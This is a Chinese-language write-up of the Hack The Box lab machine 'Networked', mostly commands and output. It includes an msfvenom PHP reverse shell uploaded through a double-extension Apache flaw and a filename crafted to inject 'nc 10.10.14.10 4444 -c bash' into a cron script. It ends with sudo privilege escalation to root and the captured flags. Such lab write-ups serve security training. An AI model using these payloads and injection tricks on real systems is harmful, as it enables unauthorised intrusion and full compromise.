Networked-htb-writeup

0x00 靶场技能介绍

章节技能：目录扫描、文件上传、apache解析漏洞、bash脚本代码分析、环境变量命令注入、scandir() 函数了解、sudo提权

参考链接：https://www.jgeek.cn/article/86

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.146

2、获取下端口信息

┌──(kali㉿kali)-[~/桌面/htb-tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.146 tcp

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

3、查看下80端口信息情况

4、扫描下目录端口信息

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.146
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.146/_23-12-14_21-15-44.txt

Target: http://10.10.10.146/

[21:15:44] Starting:                                 
[21:16:50] 301 -  235B  - /backup  ->  http://10.10.10.146/backup/          
[21:16:50] 200 -  885B  - /backup/                                          
[21:16:57] 403 -  210B  - /cgi-bin/                                         
[21:17:50] 200 -    1KB - /photos.php                                       
[21:18:20] 200 -  169B  - /upload.php                                       
[21:18:20] 301 -  236B  - /uploads  ->  http://10.10.10.146/uploads/        
[21:18:20] 200 -    2B  - /uploads/
Task Completed

5、获取下 /backup/ 目录下的信息

6、可以发现个文件上传的功能，本地生成下shell文件

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p php/reverse_php LHOST=10.10.14.10 LPORT=443 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3007 bytes
Saved as: shell.php

7、这里的Apache存在个解析漏洞

apache解析文件名从右向左解析，即使最右边的文件格式在mime.types文件内，只要文件中出现.php，就可以被php模块解析。该漏洞和apache版本和php版本无关，属于用户不当造成的解析漏洞配置AddHandler application/x-httpd-php .php。

8、通过 upload.php 上传下木马文件

http://10.10.10.146/upload.php

HTTP/1.1 200 OK
Date: Thu, 14 Dec 2023 14:34:16 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 37
Connection: close
Content-Type: text/html; charset=UTF-8

<p>file uploaded, refresh gallery</p>

9、本地挂载一个nc监听，用于获取反弹shell

访问木马地址：http://10.10.10.146/uploads/10_10_14_10.php.png

获取监听：

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.146] 45454
id
uid=48(apache) gid=48(apache) groups=48(apache)

10、通过目录不断枚举，发现了一个有用的脚本文件

ls -la /home
total 8
drwxr-xr-x.  3 root root   18 Jul  2  2019 .
drwxr-xr-x. 17 root root 4096 Sep  7  2022 ..
drwxr-xr-x.  2 guly guly 4096 Sep  6  2022 guly
ls -la /home/guly
total 28
drwxr-xr-x. 2 guly guly 4096 Sep  6  2022 .
drwxr-xr-x. 3 root root   18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root    9 Sep  7  2022 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly   18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly  193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly  231 Oct 30  2018 .bashrc
-r--r--r--. 1 root root  782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root   44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly   33 Dec 14 13:55 user.txt
sh-4.2$ cat crontab.guly
cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php
sh-4.2$ cat check_attack.php
cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
sh-4.2$

11、通过查看参考文章，了解到 $value 变量这里存在命令注入漏洞。execIP + 文件名，该脚本会读取 上传文件夹内容，检查符合符合 命名的文件，将其带入函数中去执行。结合先前的文件上传，用户是可以控制。scandir() 函数返回指定目录中的文件和目录的数组。

12、cd到 uploads 文件夹，使用 touch 配合双引号读取 nc 语句。等待定时任务执行成功，即可获得 guly用户shell：

sh-4.2$ cd /var/www/html/uploads/
cd /var/www/html/uploads/
sh-4.2$ ls
ls
10_10_14_10.php%00.png
10_10_14_10.php.png
10_10_14_10.png
127_0_0_1.png
127_0_0_2.png
127_0_0_3.png
127_0_0_4.png
index.html
sh-4.2$ touch ";nc 10.10.14.10 4444 -c bash"
touch ";nc 10.10.14.10 4444 -c bash"
sh-4.2$ ls
ls
10_10_14_10.php%00.png
10_10_14_10.php.png
10_10_14_10.png
127_0_0_1.png
127_0_0_2.png
127_0_0_3.png
127_0_0_4.png
;nc 10.10.14.10 4444 -c bash
index.html
sh-4.2$

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.146] 53302
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
python3 -c 'import pty;pty.spawn("/bin/bash")'
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

13、到这里就获取到第一个flag文件了

id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
ls
check_attack.php
crontab.guly
user.txt
cat user.txt
90d05ee195b57b1b017b120e73dea913

0x02 系统权限获取

14、查看下 sudo -l 文件

sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh

15、通过查看该脚本文件

cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0

ls -la /usr/local/sbin/changename.sh
-rwxr-xr-x 1 root root 422 Jul  8  2019 /usr/local/sbin/changename.sh
/usr/local/sbin/changename.sh

16、这里查看 https://www.jgeek.cn/article/86 文档，直接获取到最终的shell文件

sudo /usr/local/sbin/changename.sh
interface NAME:
test /bin/bash
interface PROXY_METHOD:
wrong input, try again
interface PROXY_METHOD:
test
interface BROWSER_ONLY:
test
interface BOOTPROTO:
test
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
bcfba88056214e331d0d6a1c631709d2

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/203